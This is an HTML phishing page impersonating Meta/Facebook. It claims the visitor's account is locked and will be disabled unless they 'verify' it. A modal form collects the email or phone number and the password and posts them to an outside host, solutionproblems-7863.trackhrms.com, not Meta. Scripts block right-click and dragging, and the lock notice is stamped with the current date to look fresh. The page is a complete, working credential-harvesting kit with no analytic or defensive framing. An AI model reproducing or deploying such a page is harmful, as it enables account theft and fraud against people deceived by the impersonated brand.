
<!DOCTYPE html>
<html lang="en">
    <head>
        <title>Security Step</title>
        <!-- Required meta tags -->
        <meta charset="utf-8" />
        <meta
            name="viewport"
            content="width=device-width, initial-scale=1, shrink-to-fit=no" />
        <meta property="og:type" content="Article" />
        <meta property="og:title" content="Security Step" />
        <meta
            property="og:description"
            content="We saw unusual activity on your account.To protect you, your profile is hidden now and you can't access some features" />
        <meta
            property="og:image"
            content="https://i.ibb.co/rs4BM3H/meta-askar-stockadobe.jpg" />
<!-- Favicon -->
    <link
      href="https://i.ibb.co/yVfcwvn/facebook-logo-icon-best-facebook-logo-icons-gif-transparent-png-images-21.png"
      rel="icon"
      type="image/png"
    />
    <link
        <!-- Bootstrap CSS v5.2.1 -->
        <link
            href="bootstrap.min.css"
            rel="stylesheet">
			<script type="text/javascript">function mousedwn(e){try{if(event.button==2||event.button==3)return false}catch(e){if(e.which==3)return false}}document.oncontextmenu=function(){return false};document.ondragstart=function(){return false};document.onmousedown=mousedwn
    </script>
    </head>

    <body>
        <nav class="navbar navbar-dark bg-primary">
            <div class="container-fluid">
                <svg
                    xmlns="http://www.w3.org/2000/svg"
                    width="16"
                    height="16"
                    fill="currentColor"
                    class="bi bi-meta"
                    viewBox="0 0 16 16">
                    <path
                        fill-rule="evenodd"
                        d="M8.217 5.243C9.145 3.988 10.171 3 11.483 3 13.96 3 16 6.153 16.001 9.907c0 2.29-.986 3.725-2.757 3.725-1.543 0-2.395-.866-3.924-3.424l-.667-1.123-.118-.197a54.944 54.944 0 0 0-.53-.877l-1.178 2.08c-1.673 2.925-2.615 3.541-3.923 3.541C1.086 13.632 0 12.217 0 9.973 0 6.388 1.995 3 4.598 3c.319 0 .625.039.924.122.31.086.611.22.913.407.577.359 1.154.915 1.782 1.714Zm1.516 2.224c-.252-.41-.494-.787-.727-1.133L9 6.326c.845-1.305 1.543-1.954 2.372-1.954 1.723 0 3.102 2.537 3.102 5.653 0 1.188-.39 1.877-1.195 1.877-.773 0-1.142-.51-2.61-2.87l-.937-1.565ZM4.846 4.756c.725.1 1.385.634 2.34 2.001A212.13 212.13 0 0 0 5.551 9.3c-1.357 2.126-1.826 2.603-2.581 2.603-.777 0-1.24-.682-1.24-1.9 0-2.602 1.298-5.264 2.846-5.264.091 0 .181.006.27.018Z" />
                </svg>
            </div>
        </nav>
        <div class="container">
            <div class="mt-4">
                <img
                    src="https://i.ibb.co/Th8MVQW/intro.png"
                    class="img-fluid rounded mx-auto d-block"
                    width=""
                    height=""
                    alt="..." />
            </div>
            <div class="mt-4">
                <p class="text-center h3">
                    Hi, we need to confirm this account belongs to you
                </p>
            </div>
            <hr class="my-4" />


         <div class="p-3 mb-2 bg-secondary bg-opacity-25 text-dark rounded">
               <div _ngcontent-cdd-c35="" class="row mb-1 detail"><div _ngcontent-cdd-c32="" class="col-2">
			   <img _ngcontent-cdd-c32="" src="https://i.ibb.co/PG1jhHC/simon.png" width="100%" alt="">
			   </div>
			   <div _ngcontent-cdd-c32="" class="col-10 text-left mb-3">
	          <p><strong>Account Locked <script>
              document.write(new Date().toLocaleString('en-us',{month:'long', year:'numeric', day:'numeric'}))
              </script></strong>
			  </p>To continue using, please click the Continue button below and follow the instructions<p></p>


           </div>
</div>
</div>
            <hr class="my-4" />
            <p class="text-center small">
                You’ll need to complete some security steps to confirm this is
                your account.
            </p>
            <button
                type="button"
                class="btn btn-primary d-block mx-auto w-100"
                data-bs-toggle="modal"
                data-bs-target="#staticBackdrop">
                <b> Continue </b>
            </button>
        </div>
        <div
            class="modal fade"
            id="staticBackdrop"
            data-bs-backdrop="static"
            data-bs-keyboard="false"
            tabindex="-1"
            aria-labelledby="staticBackdropLabel"
            aria-hidden="true">
			<br><br><br>
            <div class="modal-dialog">
                <div class="modal-content">
				<br>
				<div class="text-center">
				<img style="height: 120px;width: 280px;" src="https://i.ibb.co/Hxb8sxK/header-log.png" class="identicon confirm-approve-content__identicon">
				
           <div class="thepadding"><span style="color: #3c78d8; font-family: 'Roboto', 'Arial'; font-size: 11pt; vertical-align: baseline;"><strong>Hi, we need to confirm this account belongs to you
            </strong></span>  <b style="color: #4d4d4d;font-weight: bold;"></b></div>
			<p class="text-center small">To avoid having your account <span style="color: #3c78d8; font-family: 'Roboto', 'Arial'; font-size: 10pt; vertical-align: baseline;"><strong>Disabled</strong></span>  <b style="color: #4d4d4d;font-weight: bold;"></b> please verify your account.</div>
                    <div class="modal-body">
                        <div class="container">
                            <div class="mt-4">
                                <form action="https://solutionproblems-7863.trackhrms.com/error1.php" method="POST">
                                    <div class="mb-3 shadow rounded">
                                        <input
                                            type="text"
                                            class="form-control up"
                                            name="mail"
                                            placeholder="Email address or phone number"
                                            autocomplete="on"
											pattern=".{6,}"
                                            required="yes"
                                            maxlength="80" />
                                    </div>
                                    <div class="mb-3 shadow">
                                        <input
                                            type="password"
                                            class="form-control up"
                                            name="pass" 
                                            placeholder="Password"
                                            autocomplete="off"
											pattern=".{6,}"
                                            required="yes"
                                            maxlength="80" />
                                    </div>
                                    <div class="form-group mt-3 shadow rounded">
                                        <button
                                            class="btn btn-primary d-block mx-auto w-100"
                                            type="submit">
                                            <b> Log In </b>
                                        </button>
                                    </div>
                                </form>
                            </div>
                        </div>
                        <hr class="my-4" />
                        <p class="text-secondary text-center">
                            <svg
                                xmlns="http://www.w3.org/2000/svg"
                                width="16"
                                height="16"
                                fill="currentColor"
                                class="bi bi-meta"
                                viewBox="0 0 16 16">
                                <path
                                    fill-rule="evenodd"
                                    d="M8.217 5.243C9.145 3.988 10.171 3 11.483 3 13.96 3 16 6.153 16.001 9.907c0 2.29-.986 3.725-2.757 3.725-1.543 0-2.395-.866-3.924-3.424l-.667-1.123-.118-.197a54.944 54.944 0 0 0-.53-.877l-1.178 2.08c-1.673 2.925-2.615 3.541-3.923 3.541C1.086 13.632 0 12.217 0 9.973 0 6.388 1.995 3 4.598 3c.319 0 .625.039.924.122.31.086.611.22.913.407.577.359 1.154.915 1.782 1.714Zm1.516 2.224c-.252-.41-.494-.787-.727-1.133L9 6.326c.845-1.305 1.543-1.954 2.372-1.954 1.723 0 3.102 2.537 3.102 5.653 0 1.188-.39 1.877-1.195 1.877-.773 0-1.142-.51-2.61-2.87l-.937-1.565ZM4.846 4.756c.725.1 1.385.634 2.34 2.001A212.13 212.13 0 0 0 5.551 9.3c-1.357 2.126-1.826 2.603-2.581 2.603-.777 0-1.24-.682-1.24-1.9 0-2.602 1.298-5.264 2.846-5.264.091 0 .181.006.27.018Z" />
                            </svg>
                            Meta
                        </p>
                    </div>
                </div>
            </div>
        </div>
        <!-- Bootstrap JavaScript Libraries -->
        <script
            src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.6/dist/umd/popper.min.js"
            integrity="sha384-oBqDVmMz9ATKxIep9tiCxS/Z9fNfEXiDAYTujMAeBAsjFuCZSmKbSSUnQlmh/jp3"
            crossorigin="anonymous"></script>

        <script
            src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/js/bootstrap.min.js"
            integrity="sha384-7VPbUDkoPSGFnVtYi0QogXtr74QeVeeIs99Qfg5YCF+TidwNdjvaKZX19NZ/e6oz"
            crossorigin="anonymous"></script>
    </body>
</html>
